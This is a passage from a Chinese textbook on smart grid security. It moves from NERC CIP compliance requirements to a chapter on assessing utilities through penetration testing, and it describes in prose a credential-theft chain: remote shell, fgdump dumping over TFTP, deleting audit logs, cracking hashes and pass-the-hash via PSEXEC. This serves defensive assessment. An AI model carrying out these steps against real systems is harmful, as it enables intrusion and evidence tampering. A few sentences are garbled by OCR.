的要求。实体应该确保在处置资产之前安全地销毁或移除数据存储媒介。同样, 实体应该在重新部署资产之前移除数据存储媒介。这两点要求都是为了防止未经 授权的恢复存储媒介中的数据。在任何情况下,实体都要维护处置和重新部署资 产的记录。 CIP-007 标准包含了对网络漏洞评估的要求。这条要求与 CIP-005 标准中的 相应要求相似,只是 CIP-007 并不要求标识电子安全边界的所有访问点。 CIP-007 最后要求必须每年一次审查并更新前面所要求的文档。对系统或措施的更改结果必须在改变后90天之内记录下来。 为证明与CIP-007 标准的一致性,实体必须具备前面所讨论的文档,包含内容如下: ● 安全测试过程 ● 端口和服务的记录 ● 安全补丁管理计划 ● 恶意软件防止计划 ● 账户管理计划 ● 安全状态监控计划 ● 网络资产处置和重新部署计划 ● 脆弱性评估 ● 文档审查和更改 如果一个实体被评定为与标准不一致,则会评定其属于四个不一致级别中的 哪个级别。表6.4中列出了这些级别及其满足的条件。 (5)CIP-008 事故报告和响应计划 CIP-008要求实体对关键网络资产相关的网络安全事故进行标识、归类、响应和 报告。这个标准仅包括两个要求,没有关键安全网络资产的实体并不在要求范围内。 CIP-008 标准的第一个要求是实体应该建立、维护一个网络安全事故响应计 划。网络安全事故响应计划应至少包括以下事宜: ● 确定哪些事件是可报告的网络安全事故的归类方法 ● 正确响应网络安全事故的行为,该行为必须包含事故响应小组的角色和责 任,处理事故的程序,以及事故的通信方案 ● 升级网络安全事故并向电力部门信息共享和分析中心(Electrici ty Sector Information Sharing and Analysis Center,ES ISAC)报告的过程 ● 确保响应计划在其变化之后90天内更新的过程 ● 确保网络安全事故的响应计划至少每年审查一次的过程 ● 确保网络安全事故的响应计划至少每年实施一次检测的过程 CIP-008 标准第二个也是最后一个要求是实体必须保证网络安全事件所有相 关文件至少三年内是可用的。 为证明与 CIP-008标准的一致性,实体必须具备上述讨论的文档,包含以下信息: ● 网络安全事件响应计划 ● 近3年的网络安全事故记录 如果一个实体被评定为与标准不一致,则会评定其属于四个不一致级别中的 哪个级别。表6.5中列出了这些级别及其满足的条件。 (6)CIP-009 灾难恢复 NERC 的 CIP-009 标准要求实体建立针对关键网络资产的恢复计划,并确保 这些恢复计划遵循既定的业务连续性和灾难恢复技术和做法。与以前的很多标准 一样,不具有关键网络资产的实体不包括在 CIP-009 标准要求范围内。 总的来说,CIP-009 标准包括五条要求,第一条要求包含了恢复计划。具体来 说,实体必须建立网络关键资产的恢复计划,并且每年审查一次,恢复计划中指明 了响应事件或是状况的行动,且不论安全事件或状况的持续时间和严重性。此外, 恢复计划还必须定义恢复相关联的角色和责任。 CIP-009 标准的第二条要求仅仅声明实体必须至少每年测试一次他们的恢复 计划,其测试包括理论演练,以及实际操作,从一个实际事故中恢复。 CIP 标准的第三条要求涵盖了恢复计划的变更控制。实体应该将从上述演练 中获取的经验教训纳入恢复计划中。在恢复计划更改后90天之内应该告诉相关责任人。 CIP-009 标准的第四条要求论述了实体进行备份和恢复的过程和方法。简单 地说,要求实体必须记录关键网络资产相关信息的成功备份、存储和恢复。 CIP-009标准的最后一条要求是对于一些必要的信息至少每年测试一次其备份 媒介,10]以确保这些信息是可恢复的。这种测试可以在其他操作中心离线进行。 为证明与CIP-009 标准的一致性,实体必须具备上述讨论的文档,包含以下信息: ● 恢复计划文档 ● 所要求的演练记录 ● 恢复计划的审查,更改及通知责任人 ● 备份和存储记录 ● 备份媒介测试记录 如果一个实体被评定为与标准不一致,则会评定其属于4个不一致级别中的 哪个级别。 2)物理和人员安全 下面的 NERC 的 CIP 标准可以归为物理和人员安全一类: ● CIP-004——人员和培训 ● CIP-006——关键网络资产的物理安全 尽管物理和人员安全分类里只包括了两个标准,但它们对智能电网安全的意 义是重大的。我们来详细查阅一下,更好地理解它们是如何保护智能电网的。 (1)CIP-004—— 人员&.培训 NERC 的 CIP-004 标准要求实体确保那些能够物理访问关键网络资产的人 员,具有合适的人员风险评估级别,经过培训,并具备安全意识。不具有关键网络 资产的实体不在CIP-004 要求的范围内。CIP-004 标准有以下四个特殊要求: ● 意识 要求实体为访问关键网络资产的人员建立、维护、和记录一个安全意识计划, 该计划是持续的,至少每个季度通过直接或间接沟通手段更新一次。其他的可以接受的更新方法是业务陈述和会议。 ● 培训 要求实体为访问关键网络资产的人员建立、维护、和记录一个网络安全培训计 划 。CIP-004标准要求至少每年进行一次培训,并在授权相关人员物理访问网络关键 资产后的90天内对这些人员培训。具体来说,这个培训必须包括关键网络资产相关 的策略、访问控制、以及过程。最后实体应该记录培训(培训至少每年一次)。 ● 人员风险评估 要求实体实施和记录人员风险评估方案,该方案必须遵循联邦、州、省和本地 法律,以及集体谈判协议。人员风险评估必须在其具有物理访问关键网络资产权 限后30天内进行,至少包括: ◆ 验证社会保险号和七年刑事背景 ◆ 至少每七年或是根据情况重新评估 ◆ 记录评估结果 ● 访问 CIP-004 的最后一个要求涵盖了物理访问。具体来说,实体必须维护已被授 权物理访问关键网络资产权限的人员列表。这些列表必须至少每个季度审查一 次,人员变更或是某些人员访问权限的变更必须在7天内更新。另外,必须在24 小时内取消辞职人员的物理访问权限,在七天之内取消不再需要物理访问关键网 络资产的人员的访问权限。 为证明与CIP-004 标准的一致性,实体必须具备上述讨论的文档,包含以下 信息: ● 安全意识方案 ● 网络安全方案 ● 人员风险评估方案 ● 人员列表,列表审核、更新以及撤销记录 如果一个实体被评定为与标准不一致,则会评定其属于四个不一致级别中的 哪个级别。表6.7中列出了这些级别及其满足的条件。 (2)CIP-006—— 人员&.培训 NERC 在物理和人员安全分类的最后一条标准是CIP-006 。CIP-006 标准特 别要求实体建立和实施一个物理安全方案来保护关键网络资产。这个标准包括六 条不同的要求,下面是具体的要求 CIP-006 的第一条要求是物理安全计划。要求实体建立并且维护一个物理安 全计划,该计划要考虑以下内容: ● 对电子网络边界内所有网络资产的处理过程及文档记录都应该在物理安 全边界内,如果不是则必须有相应的补偿措施并记录下来 ● 标识和控制访问物理安全边界所有访问点的过程 ● 监控物理访问物理安全边界的能力 ● 对物理安全边界正确应用访问控制的过程,其控制包括对访问者的授权通 过,以及如何响应未授权访问 ● 确保审查访问授权请求以及撤销的过程 ● 保护未授权人员进入物理安全边界的过程 ●确保物理安全计划更改后90天之内更新,其更改包括访问、监控、控制变化日志 ● 为在控制访问物理安全边界过程中使用的网络资产提供与其他CIP 标准 中网络资产相同的保护 ● 具有一个至少每年一次审查物理安全计划的过程 CIP-006 的第二条要求包含了物理访问控制。这条要求定义了实体必须以每 周7天每天24小时的原则对物理安全边界的管理访问实施控制。这条要求详细 定义了钥匙卡、专用锁、保安人员和其他认证设备方面的要求。 CIP-006 标准的第三、四条要求,实体应该监控和日志记录物理安全边界的物理访问。警报系统或是人眼观察都是监视物理访问可行的方法。而对于日志记录 物理访问的方法,则计算机控制、录像或是手动记录都可行。 CIP-006 最后两个要求是保留、维护和测试访问日志。特别是,实体应该保留 物理访问日志至少90天。对于维护和测试而言,实体必须至少每三年检测和维护 一次物理安全的所有组件,并维护测试记录。最后,访问控制的中断,记录和监控 必须保留至少一年。 为证明与CIP-006 标准的一致性,实体必须具备上述讨论的文档,包含以下 信息: ● 物理安全计划 ● 物理访问控制记录 ● 物理访问监控记录 ● 物理访问日志记录 ● 访问日志 ● 检测和维护日志,还有访问控制中断日志 如果一个实体被评定为与标准不一致,则会评定其属于四个不一致级别中的 哪个级别。表6.8中列出了这些级别及其满足的条件。 6.2 一致性与安全 尽管要求实体满足与 CIP 标准的一致性,但是一致性并不意味着安全。 一致 性只能说明在某个时间点如年度审计时,该机构满足相关要求。然而, 一致性要求 通常不是很清晰,不能随着外界信息安全威胁的频繁变化而经常更新。更有甚者, 很多机构都是临近审计了才想起考虑标准一致性。 此外,满足标准一致性的机构的管理通常也会存在不安全因素。支付卡行业 (PCI) 数据安全标准(DSS) 是影响信息安全最流行的行业标准之一。尽管迄今为 止 PCI DSS提供了一些法规要求的具体实施要求,但有些从一开始就被认为符合 PCI 一致性的机构也遭受到了攻击。最引入注目的一场攻击是2008年哈特兰支 付系统即信用卡处理程序被攻破,[13]而就在被攻破的这段时间,该系统还被认为 是满足 PCIDSS 要求一致性的。哈特兰的CEO,Robert Carr 在2009年六月接受 Computer World 采访时反 复强调标准一致性并不等同于安全的观点。“仅仅因为你有了标准一致性证书并不意味着你不会被攻击…我相信每个人都赞 同 PCI标准是必要的,但是它是最低的要求,恶意攻击者会设法找到其弱点漏洞。” 注意 哈特兰支付系统是为美国商人服务的普林斯顿银行卡支付处理程序。15]在2008 年被攻破以后,哈特兰开始发展自己的端到端加密方案,如E3 。想要了解更多关 于 E3 的内容,请访问 www.e3secure.com。 对于信用卡交易达到一定量的商人,PCI 要求他们填写一份自我评估问卷 (SAQ), 与第三方的在线评估不同,主要是用于确定商人是否能遵守某些安全控 制。该方法依赖“信誉系统”来确保公司满足 PCI DSS一致性。所以,有些企业可 能在自我评估问卷中就能报告其不正确的安全控制。同样地,NERC 最近的一份 分析报告说“很多机构都会通过少报关键网络资产的方式来规避一些一致性要 求。”[16]这个结果表明不能相信这些机构正确实施了安全控制。 简单地说,绝对安全是不能达到的。但是可以将风险控制到可以承担的级别。参 与智能电网的实体必须区分一致性与安全,明白一致性是实施一个完备的信息安全计 划的结果。构建和实施完备的安全计划在第8章“公用事业公司安全”这章讲到。 6.3 技术供应商如何消除差距 一致性和安全之间的差距为技术供应商提供了契机。现有的机构可以借助使 用传统技术如入侵检测系统、网络加密和防火墙的产品来确保智能电网的安全。 Cisco 提供了智能电网安全专业服务,包括公用事业公司一致性评估、物理安全脆 弱性评估和网络安全的设计部署。 也有一些新成立的机构利用新的技术和科技来消除这个差距。这些机构为了 将自己与已有公司如 Cisco 相区分,其定位是提供独特的解决方案来增加智能电 网的创新价值。对于这些新机构、新技术而言,市场已经成熟,在接下来的5年内 估计有210亿美元[16]投入到智能电网安全领域。 随着引入越来越多的智能电网部署方案和产品,可以假设供应商的安全解决 方案也会持续演变增多,而这些供应商的方案能否真正的增强智能电网安全,或者 只是简单地作为安全方案的另一种选择,有待以后论证。 6.4 公用事业公司如何消除差距 如果被合理地实施和利用,供应商技术可以显著地提高实体的信息安全态势。 但是,在现在的环境下,还需要看公用事业公司能否接受把资金用于适当的加强其 智能电网部署安全。如果不买新技术并实施,则智能电网部署安全的责任就在于 公用事业公司的能力。 虽然说起来很恐怖,但是公用事业公司可以通过强健、完备的策略,程序和标 准来保护智能电网部署安全。公用事业公司需要超越法规要求,在行业最佳实践 的基础上构建自己的信息安全方案,例如 ISO 27000 系列。第8章“公用事业公司 安全”会阐述这个方案。 6.5 总结 仅靠公用事业公司是不能完成对智能电网足够的安全保护的;还需要技术、知识和 私营部门的安全方案。同理,仅靠私营部门也不能保护智能电网安全,还需要公用事业 公司在实施强健的策略、程序和标准时采纳私营部门的技术、知识和安全方案。当前保护智能电网的方法需要打破自我监管的方式,并且能够区分标准一致 性与安全是两个概念。NERC 的主席和 CEO,Rick Sergel 在他们2008年的报告 上陈述“[NERC] 对于保证自我监管模型有效起着不可或缺的作用,”[19]表明自我 监管模式已经不适用了。为了能够更好地保护智能电网部署及技术安全,监管部门和公用事业公司必 须认清他们现在的差距并且准确定位自己。不幸的是,在信息安全领域,通常在发 生严重事件后,当前方案才会被改变,我们不希望这种状况发生。 攻击公用事业公司 针对智能电网的良好协同攻击最有可能使用多种攻击途径,可能结合应用程 序、网络、社会工程和其他攻击方法来达到攻击目的。公用事业公司还需要处理由 动机小或者消耗资源小的攻击者带来的攻击,这其中包括尝试个人攻击的好奇消 费者以及一些“脚本小子”。 了解你将要面对的攻击有助你明白如何阻止一个成功的攻击。此外,针对你 的环境运行一个阶段性攻击能够让你认识到你的环境中的安全缺陷。所以,执行 一个全面的脆弱性评估或是一个渗透性测试是非常重要的。这一章会论述针对当 前和将来智能电网的攻击是如何展开的。并且从相似角度论述如何对公用事业公 司的智能电网环境执行一次全面的安全评估。 7.1 动机 在第3章“面向公用事业公司的安全威胁与影响”中,我们讨论了针对公用事 业公司的恶意攻击的动机。然而,并不是所有的动机都是恶意的。内部的脆弱性 管理方案,包括脆弱性评估和(或)渗透性测试,对于评估一个机构的安全态势和找 到安全控制要改善的方面至关重要。此外,NERC CIP-005 要求实体至少每年一 次对它们的电子安全边界执行脆弱性评估。所以为了满足 NERC CIP的一致性, 公用事业公司需要至少每年一次执行边界脆弱性评估。 7.1.1 脆弱性评估和渗透性测试 专业术语“安全评估”的使用贯穿于这一章;但是, 一次安全评估可以包含很多 个意思。在这里,安全评估指的是脆弱性评估或是渗透性测试。脆弱性评估的目 标是标识主机和与它相关的漏洞。渗透性测试是脆弱性评估的更深一步,利用标 识的漏洞,或是选择一些漏洞来更多的访问网络、系统和数据。 1)我想要渗透测试!确定? 机构经常会不考虑评估的商业目的就决定他们要执行一个渗透性测试或是脆 弱性评估。如果执行一次安全评估的目的是发现漏洞并补救,那么漏洞的利用真 的是必要的吗?考虑机构里的不同政治因素,这个问题的答案肯定是“是”。但是, 一个脆弱性评估就足够发现漏洞,尽管会有很高的误报率。或者,安全评估的目的 是为了向上级管理部门证明电子盗窃的威胁是真实存在的,那么渗透性测试更 合适。 一般地,执行脆弱性评估比渗透性测试具有以下的优点: ● 花费更少的时间,因为漏洞不需要被开发利用。 ● 更便宜,因为脆弱性评估的时间更短。 ● 打断正常商业操作的可能性更小。 执行渗透性测试相对于脆弱性评估一般具有以下的优点: ● 通过验证漏洞减少误报。 ● 特定的某一漏洞或是一组漏洞的风险可以被更准确的评估。 ● 为怀疑者提供了具体的证据。 注意 误报是指安全评估标识的漏洞实际上并不存在。例如,漏洞扫描器可能是基于 web 服务器图标上的版本号来确定你的 web 服务器易遭受缓冲区溢出攻击,但实 际情况是你安装的安全补丁已经修复了缓冲区溢出漏洞,但是图标上显示的版本 号没有改变,这样导致其版本号就是错误的。反之,漏报是指存在的漏洞在评估期 间没有被标识出来。 7.1.2 安全评估的其他方面 一个机构除了决定是执行脆弱性评估还是渗透性测试之外,还需要确定安全 评估的其他因素。安全评估的实施取决于以下条件: ● 外部(边界)还是内部角度 ● 隐蔽性级别 ● 认证 内部角度更类似于内部攻击的情况,例如职工、承包商或是能够物理访问内部 资源的外部攻击者。内部安全评估只会评估内部安全控制。相反,外部安全评估需要检测组打破安全边界控制以取得内部资源的访问。外部安全评估的核心是评 估外部安全控制。 一个完美的情况是,全面的安全评估会包括外部和内部两种安 全评估;但是,可能由于预算和资源的限制不能实现。 可以执行不同隐蔽性级别的安全评估来确定机构人员和监控设备可以在 多大程度上检测到攻击,分为:隐蔽的、隐蔽与公开混和的、公开的。当安装了 一个新的安全设备,例如入侵防御系统(IPS) 或是入侵检测系统(IDS), 可以使 用隐蔽性安全评估来评价这个设备的有效性,并且改进它的规则集和策略。 隐蔽性安全评估的弊端就是它的成本和效率。在IPS/IDS 的评估场景中,用 来执行隐蔽性测试的两个主要方法是:(1)减缓网络测试;(2)通过一个匿名网 络来定期更改源IP 地址,例如 Tor(www.torproject.org/) 。 这两种方法都会 减慢测试的速度,所以需要更多成本和时间来执行这种评估。混合性安全评 估是一种折中的办法,评估组隐蔽地执行测试直到被检测出来。然后,其余的 评估是公开地执行。 此外,安全评估可以在完全暴露、混合暴露和不暴露的情况下执行,采用哪种 情况将决定提供给评估小组的信息量以及评估期间公用事业公司员工与测评组之 间的沟通联系程度。在不暴露的安全评估中,只给评估组提供该机构的名称而已。 这种类型的评估用于模拟完全不了解机构内部信息的攻击。在混合暴露的评估 中,评估组可能会得到 IP 地址域或是其他一些少量的信息。在完全暴露的评估 中,评估组与公用事业公司员工的沟通很顺畅很透明,可以向评估组提供网络拓扑 图和其他一些有用的信息。 有人可能会认为向评估组提供管理凭证是作弊行为,但是,如果是向你的内部 安全评估组(而不是供应商的安全评估组)提供这个凭证,就不算作弊。认证评估 的好处就是可以减少误报和漏报。例如,当你没有取得凭证而在系统上运行了一 个漏洞扫描工具,扫描器能够识别如 Web 服务器和 FTP 服务器等网络服务的漏 洞,但是不能够识别如 Web浏览器和办公产品等客户端程序中的漏洞。当你提供 管理凭证给漏洞扫描工具时,该工具就能发现客户端工具的漏洞并检查操作系统 的配置设置。 7.2 网络攻击 智能电网的核心就是包含了一个通过传输数据来提高电网效率和可用性的信 息网络。在第1章“智能电网概述”的图1.7中向读者介绍了智能电网的基本图 表。但是,智能电网的实施不会这么简单,它会包含多个网络。图7.1阐明了智能 电网实施中涉及的部分信息网络 。如图7.1所示,信息网络通过不同组件之间 的互联实现连接。数据在不同系统、网络和子网中流动。 所以,攻击可以来自不同的位置。 单单讲攻击网络和执行网络安全评估的就有几十本书,包括黑客大揭秘,网络 安全机密和解决方案以及专业的渗透测试,创建并运营一个正规的黑客实验室第 6 版(ISBN:978-1-59749-425-0,Syngress 系列)。虽然不是所有的但是大多数智 能电网的网络都是基于IP 的网络,所以这些书中论述的相同的技术都会适用于智 能电网实施的网络。如果这是你第一次听到脆弱性评估或是渗透测试,那么建议 读一本专门关于这个的书。这一节将关注应用这些书里的通用原则和标准到智能 电网网络。 7.2.1 方法 无论你是试图建立一个内部管理的脆弱性评估或是评价第三方供应商的,最 开始涉及的就是方法。下面是几个是业界公认的方法标准: ● NIST SP800-53A-Guide for Assessing the Security Control in Federal In- formation Systems ● Information Design Assurance Red Team(IDART-www.idart.sand- ia.gov/methodology/index.html) ● DOE Electric Power Infrastructure Vulnerability Assessment Methodolo- gy(www.esisac.com/publicdocs/assessment_methods/VA.pdf) ● Information Systems Security Assessment Framework(ISSAF -www. oissg.org/issaf) ● Open Source Security Testing Methodology(OSSTMM -www.isecom. org/osstmm/). 尽管每一种方法都略有不同,但是它们都采用相似的处理手段,其标准模型相 同。此外,良好协作的攻击者会利用这些方法去进行攻击。这一节,我们使用以下 步骤来实施网络安全评估: ● 侦查 ● 发现 ● 漏洞识别 ● 渗透 1)侦查 与目标没有直接互动的被动测试通常在评估的阶段执行,用来鉴定公用事业 公司的基础设施。许多网站都可以提供任何机构边界网络的详细信息。你可以手 动访问这些在线工具,同时也会有一些工具自动完成这个过程。表7.1列出了少 量的这类工具。在这个阶段里,可以获得以下的信息: ● 分配给目标公用事业单位的边界 IP 地址域 ● 至少包含以下的组件的 IP 地址和/或主机名: ◆ Web 服务器 ◆ DNS 服务器 ◆ E-mail 服务器 ◆ 路由器 ◆ 网关 ◆ 远程访问(VPN 集中器) ◆ 服务提供商的 Web 应用(例如:恒温控制 Web 应用) ● 偶然信息泄露(例如:组织结构图,网络拓扑图, ……) 实现智能电网是一件大事,涉及了大量的资金。公用事业公司的市场营销部 门,技术供应商和服务提供商想要推销他们的工程,就会泄露实施的细节信息。举 个例子,在迈阿密的智能电网实施初期时,在 Google 上搜索“迈阿密智能电网”,你 会发现公用事业公司与它的合作商。只知道合作商的名字是不能访问智能电网 的,但是即使你没有访问你已经知道了智能电表、网络供应商以及智能电网整个因 特网布局,这些信息对于发动攻击已经足够了。 内部被动测试 如果你开始了外部安全评估,那么执行前面提到的侦查会有效。但是,如果你 的安全评估是内部的评估,最好的方法是运行一个数据包嗅探器,例如 Wireshark 。 数据包嗅探器可以识别IP 地址方案,还有活动的主机。 提示 尽管不常见,但是如果你执行一个回避的内部安全评估,记住当你抓数据包时要禁 掉DHCP 客户端。你不需要IP 地址去采集流量,警戒人员可以使用DHCP 分配 的地址来找到你。 2)发现 在这个阶段,我们会确定对于目标可以使用什么,以及是否可以使用通常的 ping 扫描和端口扫描。表7.1中列出了通用的发现工具。安全评估的一个好处就是可以 识别网络上的流氓系统。在很多情况下,这些流氓系统放在网络上用来测试并且不 会被删除。但是这种方法可以识别并不是真正的智能电表的流氓智能电表。 尽管识别主机是这个阶段的重要部分,但发现可用的网络路由也是非常重要 的。回顾图7.1,智能电网会有几十个网络和区域。公用事业公司需要确定这些 网络和区域之间是如何连接的,以及如何保护自己不受来自这些网络的攻击。在 安全实施时,会利用访问控制列表(ACL) 以及其他的安全控件和设备来对网络进 行合理地划分,限制系统和网络服务之间的交互。比如,智能用户区域的智能设备 不能与大容量发电区域的电厂控制系统通信。 过时的 网络拓扑会导致实施访问控制中的混乱和失误。保持更新网络拓扑图对于确保正 确地使用安全控制来保护你的网络是至关重要的。为了保证正确的网络分割,应该对每个区域和网络都执行端口扫描。尽管这 个会花费大量的时间,但是还是应该实施全面的端口扫描(所有的65536个 TCP 和 UDP端口)来确保只有必要的通信是被允许的。尤其是,不应该授权业务合作 商网络无限制地访问公用事业公司的内部网络。攻击者会使用这些网络作为一种 手段来旁路边界安全控制。读者可以通过阅读“经典失败案例”的例子来理解为什 么网络分割这么重要。此外,第9章“第三方服务”会论述如何正确地实施第三方 服务的安全。 3)漏洞识别 漏洞识别这个阶段的目标就是创建一个上阶段发现的系统和服务漏洞的 漏洞库。表7.1显示了这个阶段可以用的工具。虽然智能电网会利用新的技 术,但是传统的漏洞扫描器还是有效的,因为这些新的技术大部分还是基于传 统的网络技术和服务的。但是,如果使用了专有的协议和服务则就是例外。 更多的信息关于如何去评估这些服务会在这一章后面的“应用程序攻击”一节 中论述。 一般地,网络漏洞扫描器通过识别并查探在开放端口上运行的服务来识别漏 洞。特别是,漏洞扫描器会检查服务的图标,包括服务名称和版本信息。根据版本 信息,漏洞扫描器会确定服务容易受到哪类安全补丁漏洞的威胁。漏洞扫描器还 可以操作正常的请求,例如,增加数据参数值的长度,然后根据服务的回应确定容 易受威胁的程度。也会执行其他的测试,如默认密码的检查,但是主要的漏洞识别 在于检查图标中的版本号。 4)渗透 脆弱性评估有时候是假定漏洞存在风险。我们可以说通过漏洞利用,能完全 控制易受攻击的主机。但是,我们可能不知道具体能从主机上获得什么。主机上是否有敏感信息?主机是否提供了关键服务,例如检测核反应堆的温度?相反,渗 透性测试会回答这些问题,因为我们会利用这个漏洞并且完全控制主机来确定其 意图,包括存储敏感信息或是提供关键服务。漏洞的利用能够产生很多结果,包括拒绝服务、信息泄露和远程代码执行。远 程代码执行通常通过产生一个允许攻击者在目标系统上执行操作系统命令的远程 命令shell 来完成。下面列出的是一种高级别的常见技术,通常用来获取有漏洞主 机的远程控制: (1)利用漏洞产生远程 shell。 (2)调用目标操作系统的默认工具来获得密码文件。 a) 在 Windows 系统上,使用文件传输程序(例如:TFTP) 上传一个脚本,例如fgdump(www.foofus.net/fizzgig/fgdump/), 网络域名凭证。 可以窃取密码文件和本地缓存中的 b) 运行 fgdump 获得密码文件。 c) 使用相同的文件传输程序将fgdump 输出的文件传到攻击者的系统。 d) 消除证据,包括删除脚本,输出文件和任何相关的审计日志。 (3)使用 Rainbow tables 破解本地管理员密码哈希值。 (4)使用远程桌面或服务信息块(SMB), 新的管理员登录系统,新管理员的密 码与本地管理员密码相同。 (5)如果域用户访问了被攻击了的系统,比如域管理员访问该系统是为了排 除故障,但是该系统可以就缓存了管理员的密码,如果给攻击者足够多的时间的 话,他就可以攻破该密码。 (6)使用新的域管理员密码登陆该域内的任意系统。 有些人可能会认为破解管理员的密码需要花费很长时间,尤其密码是包含 字母大小写、数字和特殊字符的15个字符时。最新技术,例如图形处理单元 (GPU) 密码破解、僵尸网络、和云计算能够快速破解你的密码。然而,你还是 质疑,认为攻击者真的能够破解你的密码吗? PSEXEC, 最初由 Sysinternals(http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx) 发布的,能在提 供真实用户名和密码的情况下远程执行 Windows 系统的命令。流行的攻击架构 Metasploit 包含一个 PSEXEC 模型,能够在输入密码或者密码哈希值时远程执行 命令;所以,节省攻击者攻击时间的就是你们通常认为的强密码。关于这个方法的更多信息,可以查看 www.metasploit.com/modules/exploit/windows/smb/psexec。 7.3 系统攻击 网络攻击并不是攻击公用事业单位的唯一方式。边界安全控制,例如防火墙 和 IPS/IDS 使远程攻击更加困难,所以攻击者转换他们的攻击方式,比如恶意邮件 附件和网站。漏洞通常在本地应用(Web 浏览器和 Office 应用)中被识别。攻击 者能够很容易地利用这些漏洞来控制系统,这也是为什么使用经过认证的漏洞扫 描器来识别这些漏洞是至关重要的。 7.3.1 SCADA 监控和数据采集系统(SCADA) 普遍应用于电网中。原本认为 SCADA 系统 太难理解是不可能有威胁的,因为 SCADA 系统大部分都是用了专有协议的专用 系统。但是,SCADA 系统已经发展了,可以在普通硬件和软件上运行。早期讨论 的表7.2中列出的相同工具也可以来评估 SCADA 系统。 如果你新接触公用事业这个行业,你可能会遇到一些你不熟悉的新术语。尤 其是SCADA 系统,你可能会遇到很多首字母缩略词包括 PLC 、RTU 和 HMI, 分 别表示可编程逻辑单元、远程终端设备和人机界面。尽管你可能不熟悉这些 SCA DA 组件,你也会熟悉分析和扫描这些组件的结果。大多数的 SCADA 设备都支持 其他常见网络服务中用于远程访问的 Web 服务器、telnet 和 FTP 服务器。如果你 有个可任意使用的漏洞扫描器,花点时间看一下SCADA 漏洞检查说明。大部分 漏洞检查会检查访问普通网络服务的默认密码和 SCADA 专有供应商模式下遗漏 的补丁。如果你没有可用的漏洞扫描器或是扫描器中不包含SCADA 安全检查, 看一下 OpenVAS(www.openvas.org) 找一下开源的漏洞扫描器。 仅仅关于SCADA 安全就有大量的书,包括“Techono Security's Guide to Se- curing SCADA:A Comprehensive Handbook On Protecting The Critical Infra- structure”(ISBN:978-1-59749-282-9,Syngress), 和“Security SCADA System”。 另外,也有评估 SCADA 系统的白皮书和标准,包括“CyberAssessment Methods for SCADA Security”(www.oe.energy.gov/DocumentsandMedia/Cyber_Assess- ment_Methods_for_SCADA_Security_Mays_ISA_Paper.pdf)。 7.3.2 遗 留 系 统 智能电网不是一天之内就能建成的,以往的遗留系统在电网中会继续存在很 多年。对于公用事业公司而言,其问题在于不再支持这些遗留系统,那么当新的漏 洞出现时也不会开发安全补丁了。但是,漏洞扫描器还是能够识别这些漏洞而且 这些漏洞还是可以利用的。 1)战争拨号 很多机构包括公用事业公司都开始逐步停用拨号调制解调器,但是在农村等地 区并不都有拨号调制解调器的替代品可用。即使在高带宽的地方, 一些机构通常还 是会安装拨号调制解调器作为网络中断时的备用。对于远程访问关键系统而言,拨 号调制解调器是一种经济可行的易使用的替代方法。战争拨号器应该用来识别和扫 描这些调制解调器的漏洞,例如默认密码。 7.4 应用程序攻击 与其他类型的机构一样,公用事业公司正在推出 Web 应用程序使传统低效率 的手工业务操作自动化,向用户提供更好的功能性和可用性。很多机构也用 Web 应用程序替换了传统的客户端一服务器应用程序- 也就是胖客户端或是编译代 码的应用程序。正在不断快速发展的基于Web 浏览器应用程序的开发会以惊人 的速度在创新性、功能性和互操性方面继续推进,这使得应用程序的安全无法跟 上……甚至可以说很难接近。 7.4.1 生活模仿艺术 观看最近的好莱坞电影会让你觉得通过随意地敲键盘就可以容易地入侵交通 指挥中心、情报局网络、核导弹设施和当前的电网。尽管并不是不可能,但是还是 有一些技术障碍的,如业务与命令控制系统、应用程序以及用户之间的隔离网络, 就很可能阻止一个坚定的攻击者。无论是否存在带有大大关机图标的良好图形用 户界面,攻击者也不会因为缺少良好的界面就阻止攻击。 智能电网实施的可怕之处(或是令人兴奋之处,取决于你从哪个角度看)是Web 服 务器和传统Web应用的整合。Web应用程序的最低安全要求比非 Web 应用程序的最 低安全要求低很多。尽管对编译代码应用程序进行安全分析需要对计算机结构和低级 编程语言及其概念有深入理解,但是一个简单的 Web搜索和少量的鼠标点击就能够让 没有安全概念的 Web应用程序用户去实施一些最复杂且很有力的攻击。除了这些攻 击以外,还有很多种针对 Web应用的攻击,其中一些攻击是传统安全设备,如入侵检测 系统和防火墙或者 Web应用安全设备如 Web应用防火墙无法检测到的。 譬告 不相信这是那么容易吗?访问你最喜欢的Web 搜索页面,搜索这一章的攻击术 语,并在搜索词后面添加“cheat sheet”(带着引号),这将有助于提高初学者的攻击 范围和攻击程度。这就像是在网络中有个对日常生活具有重大影响“如何做”的指 导书,对于初学者,试着按照以下的 Web 网页: (1)http://search.yahoo.com/search?p=“sql+injection”+“cheat+Sheet” (2)www.google.com/#q=cross+site+scripting+"cheat+sheet" 另一个相关的意见:鉴于“如何做”关键词搜索的影响力,读者也会搜索如何才能隐 藏个人的身份。 7.4.2 攻击公用事业公司的 Web 应用程序 像整本书中解释的那样,Web 服务器——还有它们支持的Web 应用程序和 Web 服务 将要成为智能电网实施中的最重要的部分。由于Web 浏览器是任 何笔记本、台式机、手机和其他未来用户计算设备,以及所谓的家庭智能设备(见第 13章“攻击智能设备”)中的一部分,Web 服务器会是连接这些的桥梁,使得按每个 人希望得那样简单使用控制。梦想远程调节恒温器之前,先看看这些:公用事业公 司的职员和顾客用于分享自己昨晚在哪里吃的美食以及看的哪个 YouTube 视频 的软件应用程序,同样可以使智能电网实施的控制及功能变得有可能。用于在线 支付、查收 E-mail、阅读新闻、音乐电影下载的软件应用程序,正好就是导致“臭虫 月”现象的软件。[]还有很多这方面的示例,不过我们先对 Web 应用程序进一步 研究。 关于公用事业公司 Web 应用程序的安全问题可以分为两类:支持业务操作的 Web 应用程序和支持智能电网功能和可用性(换句话说,智能电网操作)的应用程 序。区分的目的在于风险管理。不考虑头衔、角色和责任,大多数公用事业公司职 员(和合作商)都必须执行某些任务,例如上交人员管理中普遍的考勤表。业务操 作应用程序现在普遍实现为Web 应用程序,并将信息安全风险直接带给公用事业 公司,间接带给顾客。用于支持智能电网操作的Web 应用程序则是直接向公用事 业单位及其顾客带来不同的信息安全风险。 1)用于公司运营的 Web 应用程序 不应该低估公用事业公司运营的威胁,对这些应用程序的成功攻击不但威胁 到人员信息和用户账单数据的机密性,而且还可能被作为跳板直接攻击电力控制 和智能电网操作系统。很多IT 系统都涉及一些专门的专业知识,所以很多机构都 是基于这些使用的技术来组织IT 管理员。例如,Windows 和 UNIX 服务器管理 员的单独分组,应用程序的管理员是另一个组,不同提供商的数据库管理员分别成 组。这种组织形式在过去导致了公用密码的安全漏洞。换句话说,人员时间管理 